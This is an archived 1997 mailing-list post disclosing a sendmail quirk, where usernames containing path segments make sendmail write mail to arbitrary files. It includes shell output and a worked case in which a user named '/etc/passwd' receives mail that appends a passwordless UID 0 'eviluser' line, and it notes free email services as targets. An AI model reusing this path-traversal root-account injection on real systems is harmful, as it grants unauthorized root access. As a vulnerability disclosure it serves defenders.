Date: 12/28/97 5:33:27 AM From: Duck Vader Subject: BoS: Sendmail quirks To: (""@LOCAL) Going through my mail the other day, I noticed some junk mail from ..@somehost, and wondered what would happen if I had a user by the same name. Well, it seems sendmail will readily write to a path in the username as long as it doesn't begin with a forward slash. A few quick examples: thePond:~# cat /etc/passwd | grep ../ ../../a:*:519:100:tmp:/home/tmp:/bin/tcsh thePond:~# ls -l /var/a -rw------- 1 ../../a users 0 Nov 23 12:14 /var/a thePond:/var/spool# ls -ld atjobs drwxr-xr-x 2 root root 1024 Nov 23 11:55 atjobs thePond:/var/spool# cat /etc/passwd | grep atjobs ../atjobs:*:520:100:tmp:/tmp:/bin/tcsh thePond:/var/spool# ls -l total 16 drwxr-xr-x 2 root root 1024 Nov 23 11:55 BOGUS.EYF -rw------- 1 ../atjob users 0 Nov 23 12:20 atjobs Yes, you can precede the pathname with a forward slash. thePond:~# cat /etc/passwd | grep passwd /etc/passwd:*:515:100:tmp:/home/tmp: thePond:~# cat /etc/passwd root:*:0:0:root:/root:/bin/tcsh bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: [Edited out more passwords..] >From root Tue Nov 25 20:44:00 1997 To: /etc/passwd eviluser::0:0:Sendmail quirks:/root:/bin/tcsh This probably will not be a problem for the average user. However, BBSes and free email services often let the user select his own username, and will add him to /etc/passwd for email and whatnot. If I ran into a site that did this, I could just specify my login as /etc/passwd and write myself a new username, this time with UID:GID 0:0 :) *---------------------------------* | tiepilot - The Duck Jedi Master | | | | duckvader@quackquack.com | | tiepilot@thepentagon.com | *---------------------------------* Never put off till tomorrow what you can avoid all together. Hacker's Law: The belief that enhanced understanding will necessarily stir a nation to action is one of mankind's oldest illusions.